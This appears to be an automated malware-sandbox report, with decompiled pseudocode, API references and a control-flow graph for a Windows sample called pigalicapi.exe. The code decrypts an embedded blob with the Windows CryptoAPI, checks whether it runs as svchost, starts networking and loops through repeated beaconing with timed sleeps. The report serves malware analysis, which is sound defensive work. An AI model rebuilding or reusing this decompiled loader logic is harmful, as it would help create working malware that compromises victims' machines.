                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 <= 0x300) {
                                                                                                                                                                                                                                                                                          					L25:
                                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					_t61 = CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                          					if(_t61 == 0 && GetLastError() == 0x80090016) {
                                                                                                                                                                                                                                                                                          						CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8); // executed
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						_v788 = 0x10;
                                                                                                                                                                                                                                                                                          						_v784 = 0x10;
                                                                                                                                                                                                                                                                                          						_v792 = 0;
                                                                                                                                                                                                                                                                                          						while(_v792 < _a8 - 0x2ff) {
                                                                                                                                                                                                                                                                                          							E04007B70( &_v780, _a4 + _v792, 0x300);
                                                                                                                                                                                                                                                                                          							_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                                          							_t67 =  &_v780;
                                                                                                                                                                                                                                                                                          							_v800 = _t67;
                                                                                                                                                                                                                                                                                          							_v796 = 0;
                                                                                                                                                                                                                                                                                          							__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v796);
                                                                                                                                                                                                                                                                                          							if(_t67 == 0) {
                                                                                                                                                                                                                                                                                          								L21:
                                                                                                                                                                                                                                                                                          								if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          									_v792 = _v792 + 1;
                                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t68 = _v800;
                                                                                                                                                                                                                                                                                          							__imp__CryptHashData(_v796, _t68, 0x10, 0);
                                                                                                                                                                                                                                                                                          							if(_t68 != 0) {
                                                                                                                                                                                                                                                                                          								_v804 = 0;
                                                                                                                                                                                                                                                                                          								_t69 = _v796;
                                                                                                                                                                                                                                                                                          								__imp__CryptDeriveKey(_v12, 0x6801, _t69, 1,  &_v804); // executed
                                                                                                                                                                                                                                                                                          								if(_t69 != 0) {
                                                                                                                                                                                                                                                                                          									_v812 = 0x2f0;
                                                                                                                                                                                                                                                                                          									_v808 = CryptDecrypt(_v804, 0, 1, 0,  &_v764,  &_v812);
                                                                                                                                                                                                                                                                                          									CryptDestroyKey(_v804);
                                                                                                                                                                                                                                                                                          									if(_v808 != 0) {
                                                                                                                                                                                                                                                                                          										_t73 =  &_v816;
                                                                                                                                                                                                                                                                                          										__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t73);
                                                                                                                                                                                                                                                                                          										if(_t73 != 0) {
                                                                                                                                                                                                                                                                                          											_t74 = _v816;
                                                                                                                                                                                                                                                                                          											__imp__CryptHashData(_t74,  &_v780, 0x2f0, 0);
                                                                                                                                                                                                                                                                                          											if(_t74 != 0) {
                                                                                                                                                                                                                                                                                          												_v820 = 0;
                                                                                                                                                                                                                                                                                          												_v824 = 4;
                                                                                                                                                                                                                                                                                          												_t76 = _v816;
                                                                                                                                                                                                                                                                                          												__imp__CryptGetHashParam(_t76, 4,  &_v820,  &_v824, 0);
                                                                                                                                                                                                                                                                                          												if(_t76 != 0) {
                                                                                                                                                                                                                                                                                          													_v828 = 0x10;
                                                                                                                                                                                                                                                                                          													_t77 = _v816;
                                                                                                                                                                                                                                                                                          													__imp__CryptGetHashParam(_t77, 2,  &_v844,  &_v828, 0);
                                                                                                                                                                                                                                                                                          													if(_t77 != 0) {
                                                                                                                                                                                                                                                                                          														_t78 = E04007C70( &_v28,  &_v844,  &_v28, 0x10);
                                                                                                                                                                                                                                                                                          														_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                                          														if((_t78 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          															E04007B70(_a12,  &_v780, 0x300);
                                                                                                                                                                                                                                                                                          															_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                                          															_v5 = 1;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											__imp__CryptDestroyHash(_v816);
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							__imp__CryptDestroyHash(_v796);
                                                                                                                                                                                                                                                                                          							goto L21;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L25;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}































                                                                                                                                                                                                                                                                                          0x040047f9
                                                                                                                                                                                                                                                                                          0x04004801
                                                                                                                                                                                                                                                                                          0x04004aab
                                                                                                                                                                                                                                                                                          0x04004ab1
                                                                                                                                                                                                                                                                                          0x04004814
                                                                                                                                                                                                                                                                                          0x04004814
                                                                                                                                                                                                                                                                                          0x0400482a
                                                                                                                                                                                                                                                                                          0x04004832
                                                                                                                                                                                                                                                                                          0x04004850
                                                                                                                                                                                                                                                                                          0x04004850
                                                                                                                                                                                                                                                                                          0x0400485a
                                                                                                                                                                                                                                                                                          0x04004860
                                                                                                                                                                                                                                                                                          0x0400486a
                                                                                                                                                                                                                                                                                          0x04004874
                                                                                                                                                                                                                                                                                          0x0400488f
                                                                                                                                                                                                                                                                                          0x040048b9
                                                                                                                                                                                                                                                                                          0x040048be
                                                                                                                                                                                                                                                                                          0x040048c1
                                                                                                                                                                                                                                                                                          0x040048c7
                                                                                                                                                                                                                                                                                          0x040048cd
                                                                                                                                                                                                                                                                                          0x040048eb
                                                                                                                                                                                                                                                                                          0x040048f3
                                                                                                                                                                                                                                                                                          0x04004a90
                                                                                                                                                                                                                                                                                          0x04004a96
                                                                                                                                                                                                                                                                                          0x04004889
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004889
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004a98
                                                                                                                                                                                                                                                                                          0x040048fd
                                                                                                                                                                                                                                                                                          0x0400490b
                                                                                                                                                                                                                                                                                          0x04004913
                                                                                                                                                                                                                                                                                          0x04004919
                                                                                                                                                                                                                                                                                          0x0400492c
                                                                                                                                                                                                                                                                                          0x0400493c
                                                                                                                                                                                                                                                                                          0x04004944
                                                                                                                                                                                                                                                                                          0x0400494a
                                                                                                                                                                                                                                                                                          0x04004975
                                                                                                                                                                                                                                                                                          0x04004982
                                                                                                                                                                                                                                                                                          0x0400498f
                                                                                                                                                                                                                                                                                          0x04004995
                                                                                                                                                                                                                                                                                          0x040049a9
                                                                                                                                                                                                                                                                                          0x040049b1
                                                                                                                                                                                                                                                                                          0x040049c5
                                                                                                                                                                                                                                                                                          0x040049cc
                                                                                                                                                                                                                                                                                          0x040049d4
                                                                                                                                                                                                                                                                                          0x040049da
                                                                                                                                                                                                                                                                                          0x040049e4
                                                                                                                                                                                                                                                                                          0x04004a00
                                                                                                                                                                                                                                                                                          0x04004a07
                                                                                                                                                                                                                                                                                          0x04004a0f
                                                                                                                                                                                                                                                                                          0x04004a11
                                                                                                                                                                                                                                                                                          0x04004a2d
                                                                                                                                                                                                                                                                                          0x04004a34
                                                                                                                                                                                                                                                                                          0x04004a3c
                                                                                                                                                                                                                                                                                          0x04004a4b
                                                                                                                                                                                                                                                                                          0x04004a50
                                                                                                                                                                                                                                                                                          0x04004a58
                                                                                                                                                                                                                                                                                          0x04004a6a
                                                                                                                                                                                                                                                                                          0x04004a6f
                                                                                                                                                                                                                                                                                          0x04004a72
                                                                                                                                                                                                                                                                                          0x04004a72
                                                                                                                                                                                                                                                                                          0x04004a58
                                                                                                                                                                                                                                                                                          0x04004a3c
                                                                                                                                                                                                                                                                                          0x04004a0f
                                                                                                                                                                                                                                                                                          0x04004a7d
                                                                                                                                                                                                                                                                                          0x04004a7d
                                                                                                                                                                                                                                                                                          0x040049b1
                                                                                                                                                                                                                                                                                          0x0400498f
                                                                                                                                                                                                                                                                                          0x04004944
                                                                                                                                                                                                                                                                                          0x04004a8a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004a8a
                                                                                                                                                                                                                                                                                          0x04004aa5
                                                                                                                                                                                                                                                                                          0x04004aa5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400485a

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 0400482A
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04004834
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04004850
                                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
                                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
                                                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
                                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
                                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 040049A9
                                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 040049CC
                                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 04004A07
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0400481F
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04004845
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$AcquireContextCreateData$DecryptDeriveDestroyErrorLastParam
                                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                          • API String ID: 2739279601-947817771
                                                                                                                                                                                                                                                                                          • Opcode ID: 42090ebe0b84d1e6b92d05052a41d8df984fe46a239ada941c44efd33afc4f41
                                                                                                                                                                                                                                                                                          • Instruction ID: 68028e15a08110d1318f396c41aabee13b9dff780772823a15a50aa733777c46
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42090ebe0b84d1e6b92d05052a41d8df984fe46a239ada941c44efd33afc4f41
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E71DF71A54318ABFB65CF50CC45BED77BCAB48B04F408598A605BA1C0DBB9ABC4CF54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 626 4003b00-4003b5c call 4001000 call 4003130 call 4002ed0 GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize call 4004510 635 4003b62-4003c8c call 4007d20 call 4005700 call 4005a00 call 4007d20 call 4009400 call 40099f0 call 4006060 call 4005e00 StrStrIA call 4001120 call 4005e30 call 4006cf0 call 4005f30 call 4009b90 WSAStartup 626->635 636 400400a-400400c ExitProcess 626->636 635->636 663 4003c92-4003cb1 635->663 664 4003cc0-4003cc9 663->664 665 4003cb3-4003cbb 663->665 666 4003cda-4003ce3 664->666 667 4003ccb-4003cd4 664->667 665->664 668 4003cf4-4003cfd 666->668 669 4003ce5-4003cee 666->669 667->666 670 4003d0c-4003d15 668->670 671 4003cff-4003d07 668->671 669->668 672 4003d26-4003d2f 670->672 673 4003d17-4003d20 670->673 671->670 674 4003d40-4003dfd call 4007d20 call 400a700 call 400a4b0 call 4005b50 call 4008a70 672->674 675 4003d31-4003d3a 672->675 673->672 686 4003e49 674->686 687 4003dff-4003e3f call 4007d20 call 40078d0 674->687 675->674 689 4003e53-4003eab call 4007970 call 4004020 686->689 687->686 697 4003eb1-4003ed9 call 4004020 689->697 698 4003f8a 689->698 704 4003f81 697->704 705 4003edf-4003efa call 4004020 697->705 700 4003f91-4003f9a 698->700 702 4003f9c-4003fa3 700->702 703 4003fed-4003ffa Sleep 700->703 706 4003fd0-4003fd7 702->706 707 4003fa5-4003fac 702->707 703->636 703->689 708 4003f88 704->708 713 4003eff-4003f07 705->713 706->703 712 4003fd9-4003fe3 706->712 710 4003fc4 707->710 711 4003fae-4003fc2 707->711 708->700 714 4003fce 710->714 711->714 712->703 715 4003f78 713->715 716 4003f09-4003f50 call 40042e0 call 4004020 713->716 714->703 717 4003f7f 715->717 722 4003f52 716->722 723 4003f59-4003f60 716->723 717->708 722->723 724 4003f62-4003f70 VirtualFree 723->724 725 4003f76 723->725 724->725 725->717
                                                                                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                                                                                          			_entry_() {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				char _v1148;
                                                                                                                                                                                                                                                                                          				signed char _v1149;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1156;
                                                                                                                                                                                                                                                                                          				char _v1556;
                                                                                                                                                                                                                                                                                          				char _v9556;
                                                                                                                                                                                                                                                                                          				long _v9560;
                                                                                                                                                                                                                                                                                          				char _v9564;
                                                                                                                                                                                                                                                                                          				char _v12068;
                                                                                                                                                                                                                                                                                          				signed int _v12072;
                                                                                                                                                                                                                                                                                          				char _v12076;
                                                                                                                                                                                                                                                                                          				long _v12080;
                                                                                                                                                                                                                                                                                          				char _v12081;
                                                                                                                                                                                                                                                                                          				long _v12088;
                                                                                                                                                                                                                                                                                          				long _v12092;
                                                                                                                                                                                                                                                                                          				long _v12096;
                                                                                                                                                                                                                                                                                          				signed int _v12100;
                                                                                                                                                                                                                                                                                          				signed char _v12101;
                                                                                                                                                                                                                                                                                          				long _v12108;
                                                                                                                                                                                                                                                                                          				signed int _v12112;
                                                                                                                                                                                                                                                                                          				void* _v12116;
                                                                                                                                                                                                                                                                                          				signed char _t69;
                                                                                                                                                                                                                                                                                          				intOrPtr _t74;
                                                                                                                                                                                                                                                                                          				signed char _t77;
                                                                                                                                                                                                                                                                                          				signed char _t79;
                                                                                                                                                                                                                                                                                          				signed int _t80;
                                                                                                                                                                                                                                                                                          				signed char _t85;
                                                                                                                                                                                                                                                                                          				signed char _t86;
                                                                                                                                                                                                                                                                                          				signed char _t87;
                                                                                                                                                                                                                                                                                          				intOrPtr _t88;
                                                                                                                                                                                                                                                                                          				char* _t89;
                                                                                                                                                                                                                                                                                          				signed int _t97;
                                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                                          				signed int _t100;
                                                                                                                                                                                                                                                                                          				signed char _t102;
                                                                                                                                                                                                                                                                                          				signed char _t104;
                                                                                                                                                                                                                                                                                          				signed char _t106;
                                                                                                                                                                                                                                                                                          				signed char _t110;
                                                                                                                                                                                                                                                                                          				signed int _t116;
                                                                                                                                                                                                                                                                                          				signed int _t118;
                                                                                                                                                                                                                                                                                          				char _t125;
                                                                                                                                                                                                                                                                                          				signed int _t138;
                                                                                                                                                                                                                                                                                          				signed int _t140;
                                                                                                                                                                                                                                                                                          				intOrPtr _t143;
                                                                                                                                                                                                                                                                                          				signed int _t159;
                                                                                                                                                                                                                                                                                          				signed int _t161;
                                                                                                                                                                                                                                                                                          				void* _t163;
                                                                                                                                                                                                                                                                                          				void* _t165;
                                                                                                                                                                                                                                                                                          				void* _t173;
                                                                                                                                                                                                                                                                                          				void* _t177;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				E04001000(0x2f50);
                                                                                                                                                                                                                                                                                          				_v8 = E04003130();
                                                                                                                                                                                                                                                                                          				E04002ED0(_v8);
                                                                                                                                                                                                                                                                                          				GetModuleFileNameA(0, "C:\Users\hardz\pigalicapi.exe", 0x208);
                                                                                                                                                                                                                                                                                          				SetUnhandledExceptionFilter(E04005DB0); // executed
                                                                                                                                                                                                                                                                                          				__imp__CoInitialize(0); // executed
                                                                                                                                                                                                                                                                                          				_t69 = E04004510(_v8, 0x4013c88); // executed
                                                                                                                                                                                                                                                                                          				_t165 = _t163 + 0xc;
                                                                                                                                                                                                                                                                                          				if((_t69 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          					L39:
                                                                                                                                                                                                                                                                                          					ExitProcess(0);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				E04007D20( &_v1148,  &_v1148, 0, 0x46b);
                                                                                                                                                                                                                                                                                          				E04005700( &_v1148); // executed
                                                                                                                                                                                                                                                                                          				_t143 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                          				_t74 = E04005A00( &_v1148, _t143, 0xff); // executed
                                                                                                                                                                                                                                                                                          				_v1156 = _t74;
                                                                                                                                                                                                                                                                                          				E04007D20(_t74, "Vatwyovatk", 0, 0x12c);
                                                                                                                                                                                                                                                                                          				E04009400( &_v1148, "Vatwyovatk", 0xa); // executed
                                                                                                                                                                                                                                                                                          				_t77 = E040099F0(); // executed
                                                                                                                                                                                                                                                                                          				 *0x401435a = _t77;
                                                                                                                                                                                                                                                                                          				 *0x401435d = E04006060(); // executed
                                                                                                                                                                                                                                                                                          				_t79 = E04005E00(); // executed
                                                                                                                                                                                                                                                                                          				 *0x401435e = _t79;
                                                                                                                                                                                                                                                                                          				_t80 = StrStrIA("C:\Users\hardz\pigalicapi.exe", "svchost.exe");
                                                                                                                                                                                                                                                                                          				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          				 *0x4014362 =  ~( ~_t80);
                                                                                                                                                                                                                                                                                          				E04001120("C:\Users\hardz\pigalicapi.exe", "pigalicapi",  *0x401435a & 0x000000ff,  *0x4014362 & 0x000000ff, 0x401436c); // executed
                                                                                                                                                                                                                                                                                          				_t85 = E04005E30(0); // executed
                                                                                                                                                                                                                                                                                          				 *0x401435b = _t85;
                                                                                                                                                                                                                                                                                          				 *0x401435f = 1; // executed
                                                                                                                                                                                                                                                                                          				_t86 = E04006CF0(); // executed
                                                                                                                                                                                                                                                                                          				_v1149 = _t86;
                                                                                                                                                                                                                                                                                          				_t87 = E04005F30(); // executed
                                                                                                                                                                                                                                                                                          				 *0x401435c = _t87 & 0x000000ff | _v1149 & 0x000000ff;
                                                                                                                                                                                                                                                                                          				_t88 = E04009B90(0xffffffff);
                                                                                                                                                                                                                                                                                          				_t173 = _t165 + 0x50;
                                                                                                                                                                                                                                                                                          				 *0x4014364 = _t88;
                                                                                                                                                                                                                                                                                          				_t89 =  &_v1556;
                                                                                                                                                                                                                                                                                          				_push(_t89);
                                                                                                                                                                                                                                                                                          				_push(0x202); // executed
                                                                                                                                                                                                                                                                                          				L0400B1E6(); // executed
                                                                                                                                                                                                                                                                                          				if(_t89 != 0) {
                                                                                                                                                                                                                                                                                          					goto L39;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t125 =  *0x40119a8; // 0x1d
                                                                                                                                                                                                                                                                                          					_v12081 = _t125;
                                                                                                                                                                                                                                                                                          					 *0x4014378 = 0x10;
                                                                                                                                                                                                                                                                                          					if(( *0x401435f & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_t118 =  *0x4014378; // 0x1c
                                                                                                                                                                                                                                                                                          						 *0x4014378 = _t118 | 0x00000008;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(( *0x401435c & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_t161 =  *0x4014378; // 0x1c
                                                                                                                                                                                                                                                                                          						 *0x4014378 = _t161 | 0x00000001;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(( *0x401435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_t140 =  *0x4014378; // 0x1c
                                                                                                                                                                                                                                                                                          						 *0x4014378 = _t140 | 0x00000004;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(( *0x401435e & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_t116 =  *0x4014378; // 0x1c
                                                                                                                                                                                                                                                                                          						 *0x4014378 = _t116 | 0x00000002;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(( *0x4014360 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_t159 =  *0x4014378; // 0x1c
                                                                                                                                                                                                                                                                                          						 *0x4014378 = _t159 | 0x00000020;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t91 =  *0x4014361 & 0x000000ff;
                                                                                                                                                                                                                                                                                          					if(( *0x4014361 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_t138 =  *0x4014378; // 0x1c
                                                                                                                                                                                                                                                                                          						 *0x4014378 = _t138 | 0x00000040;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v9564 = 0x9c3;
                                                                                                                                                                                                                                                                                          					E04007D20(_t91,  &_v12068, 0, 0x9c4);
                                                                                                                                                                                                                                                                                          					E0400A700();
                                                                                                                                                                                                                                                                                          					E0400A4B0( &_v12068,  &_v9564, 0x4013cb6,  *0x4013cb4 & 0x0000ffff);
                                                                                                                                                                                                                                                                                          					_v9560 = 0;
                                                                                                                                                                                                                                                                                          					_t97 = E04005B50( &_v12068, ";",  &_v9560, 0); // executed
                                                                                                                                                                                                                                                                                          					_v12072 = _t97;
                                                                                                                                                                                                                                                                                          					_v12092 = 0;
                                                                                                                                                                                                                                                                                          					_v12080 = 0;
                                                                                                                                                                                                                                                                                          					_v12076 = 0x4b0;
                                                                                                                                                                                                                                                                                          					_t98 = E04008A70(0x4012c34,  &_v12076, 0x4012ba8, 0x8c, 0x400e008, 0x254); // executed
                                                                                                                                                                                                                                                                                          					_t177 = _t173 + 0x44;
                                                                                                                                                                                                                                                                                          					if(_t98 != 0) {
                                                                                                                                                                                                                                                                                          						E04007D20( &_v9556,  &_v9556, 0, 0x1f40);
                                                                                                                                                                                                                                                                                          						E040078D0(0x4012c34, 0xc8,  &_v9556, 0xc8);
                                                                                                                                                                                                                                                                                          						_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                                          						_v12092 =  &_v9556;
                                                                                                                                                                                                                                                                                          						_v12080 = 0xc8;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v12088 = 0;
                                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                                          					_v12101 = 0;
                                                                                                                                                                                                                                                                                          					_v12108 = 0x1d4c0;
                                                                                                                                                                                                                                                                                          					_v12096 = 0;
                                                                                                                                                                                                                                                                                          					_t100 = E04007970( &_v12096); // executed
                                                                                                                                                                                                                                                                                          					_v12100 = _t100;
                                                                                                                                                                                                                                                                                          					_t102 = E04004020(_v12096, _v12100,  &_v1148, 1, 2, 0);
                                                                                                                                                                                                                                                                                          					_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                                          					if((_t102 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_v12101 = 1;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t104 = E04004020(_v12092, _v12080,  &_v1148, 1, 5, 0);
                                                                                                                                                                                                                                                                                          						_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                                                          						if((_t104 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          							_v12101 = 1;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t106 = E04004020(_v9560, _v12072,  &_v1148, 3, 0xa, 1); // executed
                                                                                                                                                                                                                                                                                          							_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                                                          							if((_t106 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          								_v12101 = 1;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_v12116 = 0;
                                                                                                                                                                                                                                                                                          								_v12112 = E040042E0( &_v12116);
                                                                                                                                                                                                                                                                                          								_t110 = E04004020(_v12116, _v12112,  &_v1148, 1, 0x17, 0);
                                                                                                                                                                                                                                                                                          								_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                                          								if((_t110 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          									_v12101 = 1;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								if(_v12116 != 0) {
                                                                                                                                                                                                                                                                                          									VirtualFree(_v12116, 0, 0x8000);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if((_v12101 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						if( *0x40118a4 != 1) {
                                                                                                                                                                                                                                                                                          							if( *0x40118a4 == 2) {
                                                                                                                                                                                                                                                                                          								 *0x40118a4 = 1;
                                                                                                                                                                                                                                                                                          								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							if( *0x40130e4 != 2) {
                                                                                                                                                                                                                                                                                          								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_v12108 = 0x3e8;
                                                                                                                                                                                                                                                                                          								 *0x40118a4 = 2;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					Sleep(_v12108); // executed
                                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





















































                                                                                                                                                                                                                                                                                          0x04003b08
                                                                                                                                                                                                                                                                                          0x04003b12
                                                                                                                                                                                                                                                                                          0x04003b19
                                                                                                                                                                                                                                                                                          0x04003b2d
                                                                                                                                                                                                                                                                                          0x04003b38
                                                                                                                                                                                                                                                                                          0x04003b40
                                                                                                                                                                                                                                                                                          0x04003b4f
                                                                                                                                                                                                                                                                                          0x04003b54
                                                                                                                                                                                                                                                                                          0x04003b5c
                                                                                                                                                                                                                                                                                          0x0400400a
                                                                                                                                                                                                                                                                                          0x0400400c
                                                                                                                                                                                                                                                                                          0x0400400c
                                                                                                                                                                                                                                                                                          0x04003b70
                                                                                                                                                                                                                                                                                          0x04003b7f
                                                                                                                                                                                                                                                                                          0x04003b8c
                                                                                                                                                                                                                                                                                          0x04003b9a
                                                                                                                                                                                                                                                                                          0x04003ba2
                                                                                                                                                                                                                                                                                          0x04003bb4
                                                                                                                                                                                                                                                                                          0x04003bca
                                                                                                                                                                                                                                                                                          0x04003bd2
                                                                                                                                                                                                                                                                                          0x04003bd7
                                                                                                                                                                                                                                                                                          0x04003be1
                                                                                                                                                                                                                                                                                          0x04003be6
                                                                                                                                                                                                                                                                                          0x04003beb
                                                                                                                                                                                                                                                                                          0x04003bfa
                                                                                                                                                                                                                                                                                          0x04003c02
                                                                                                                                                                                                                                                                                          0x04003c06
                                                                                                                                                                                                                                                                                          0x04003c2a
                                                                                                                                                                                                                                                                                          0x04003c34
                                                                                                                                                                                                                                                                                          0x04003c3c
                                                                                                                                                                                                                                                                                          0x04003c41
                                                                                                                                                                                                                                                                                          0x04003c48
                                                                                                                                                                                                                                                                                          0x04003c4d
                                                                                                                                                                                                                                                                                          0x04003c53
                                                                                                                                                                                                                                                                                          0x04003c64
                                                                                                                                                                                                                                                                                          0x04003c6c
                                                                                                                                                                                                                                                                                          0x04003c71
                                                                                                                                                                                                                                                                                          0x04003c74
                                                                                                                                                                                                                                                                                          0x04003c79
                                                                                                                                                                                                                                                                                          0x04003c7f
